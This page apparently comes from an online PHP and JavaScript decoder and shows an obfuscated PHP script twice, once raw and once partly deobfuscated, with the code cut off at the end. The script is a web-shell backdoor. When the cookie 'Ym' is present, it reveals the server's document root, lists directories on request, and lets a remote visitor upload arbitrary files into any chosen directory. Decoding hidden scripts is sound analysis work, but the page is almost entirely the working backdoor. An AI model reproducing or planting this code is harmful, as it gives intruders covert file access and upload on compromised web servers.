Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

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if(isset($_COOKIE['Ym'])) {
 goto Drv3J; Y8BL1: if (!empty($_GET["get_dir"])) { echo "|" . $_SERVER["DOCUMENT_ROOT"] . "|
\xa"; if (!empty($_GET["dir"])) { GetListDir($_GET["dir"]); } } goto w0Xq3; d_NpY: function GetListDir($dir) { $ywvpzkcsxlbw = "files"; $djhbhhms = "dir"; if (empty(${${"GLOBALS"}["vveicwrv"]})) { return null; } ${"GLOBALS"}["eryvscdubvjd"] = "file"; ${$ywvpzkcsxlbw} = scandir(${$djhbhhms}); echo "@dir@\xd\xa"; foreach (${${"GLOBALS"}["rgujorhnvm"]} as ${${"GLOBALS"}["eryvscdubvjd"]}) { if (${${"GLOBALS"}["avrrawgg"]} !=  & ${${"GLOBALS"}["avrrawgg"]} != "..") { ${"GLOBALS"}["bpcwkw"] = "dir"; ${"GLOBALS"}["bnnfzotjgofu"] = "file"; ${"GLOBALS"}["bfuftrvfie"] = "file"; ${"GLOBALS"}["ywlpwsd"] = "dir"; $keuxfjqkuld = "file"; $wgfsdwpf = "file"; if (is_dir(${${"GLOBALS"}["ywlpwsd"]} . "/" . ${$wgfsdwpf})) { echo "[" . ${${"GLOBALS"}["bfuftrvfie"]} . "]\xd\xa"; } if (is_file(${${"GLOBALS"}["bpcwkw"]} . "/" . ${${"GLOBALS"}["bnnfzotjgofu"]})) { echo "<" . ${$keuxfjqkuld} . ">\xd\xa"; } } } } goto Lqmk5; Lqmk5: function UploadFile($file) { $isvysygf = "file"; if (empty(${${"GLOBALS"}["avrrawgg"]})) { return null; } if (is_uploaded_file(${$isvysygf}["tmp_name"])) { if (!empty($_POST["dir"])) { if (move_uploaded_file(${${"GLOBALS"}["avrrawgg"]}["tmp_name"], $_POST["dir"] . "/" . ${${"GLOBALS"}["avrrawgg"]}["name"])) { echo "@true@\xd
"; GetListDir($_POST["dir"]); } } else { $omrnzznsr = "file"; ${"GLOBALS"}["txuqtoroiph"] = "file"; if (move_uploaded_file(${${"GLOBALS"}["txuqtoroiph"]}["tmp_name"], ${$omrnzznsr}["name"])) { echo "true"; } } } } goto GgbA_; Drv3J: ${"GLOBALS"}["avrrawgg"] = "file"; goto gBvFD; gBvFD: ${"GLOBALS"}["rgujorhnvm"] = "files"; goto hUZz2; GgbA_: if (!empty($_GET["test"])) { echo "testtrue"; } goto Y8BL1; w0Xq3: if (!empty($_FILES["filename"])) { UploadFile($_FILES["filename"]); } goto OO1Xg; hUZz2: ${"GLOBALS"}["vveicwrv"] = "dir"; goto d_NpY; OO1Xg:

if(isset($_COOKIE['Ym'])) {
 goto Drv3J; Y8BL1: if (!empty($_GET["get_dir"])) { echo "|" . $_SERVER["DOCUMENT_ROOT"] . "|
\xa"; if (!empty($_GET["dir"])) { GetListDir($_GET["dir"]); } } goto w0Xq3; d_NpY: function GetListDir($dir) {   if (empty(${${"GLOBALS"}["vveicwrv"]})) { return null; } ${"GLOBALS"}["eryvscdubvjd"] = "file"; ${"files"} = scandir(${"dir"}); echo "@dir@\xd\xa"; foreach (${${"GLOBALS"}["rgujorhnvm"]} as ${${"GLOBALS"}["eryvscdubvjd"]}) { if (${${"GLOBALS"}["avrrawgg"]} !=  & ${${"GLOBALS"}["avrrawgg"]} != "..") { ${"GLOBALS"}["bpcwkw"] = "dir"; ${"GLOBALS"}["bnnfzotjgofu"] = "file"; ${"GLOBALS"}["bfuftrvfie"] = "file"; ${"GLOBALS"}["ywlpwsd"] = "dir";   if (is_dir(${${"GLOBALS"}["ywlpwsd"]} . "/" . ${"file"})) { echo "[" . ${${"GLOBALS"}["bfuftrvfie"]} . "]\xd\xa"; } if (is_file(${${"GLOBALS"}["bpcwkw"]} . "/" . ${${"GLOBALS"}["bnnfzotjgofu"]})) { echo "<" . ${"file"} . ">\xd\xa"; } } } } goto Lqmk5; Lqmk5: function UploadFile($file) {  if (empty(${${"GLOBALS"}["avrrawgg"]})) { return null; } if (is_uploaded_file(${"file"}["tmp_name"])) { if (!empty($_POST["dir"])) { if (move_uploaded_file(${${"GLOBALS"}["avrrawgg"]}["tmp_name"], $_POST["dir"] . "/" . ${${"GLOBALS"}["avrrawgg"]}["name"])) { echo "@true@\xd
"; GetListDir($_POST["dir"]); } } else {  ${"GLOBALS"}["txuqtoroiph"] = "file"; if (move_uploaded_file(${${"GLOBALS"}["txuqtoroiph"]}["tmp_name"], ${"file"}["name"])) { echo "true"; } } } } goto GgbA_; Drv3J: ${"GLOBALS"}["avrrawgg"] = "file"; goto gBvFD; gBvFD: ${"GLOBALS"}["rgujorhnvm"] = "files"; goto hUZz2; GgbA_: if (!empty($_GET["test"])) { echo "testtrue"; } goto Y8BL1; w0Xq3: if (!empty($_FILES["filename"])) { UploadFile($_FILES["filename"]); } goto OO1Xg; hUZz2: ${"GLOBALS"}["vveicwrv"] = "dir"; goto d_NpY; OO1Xg:

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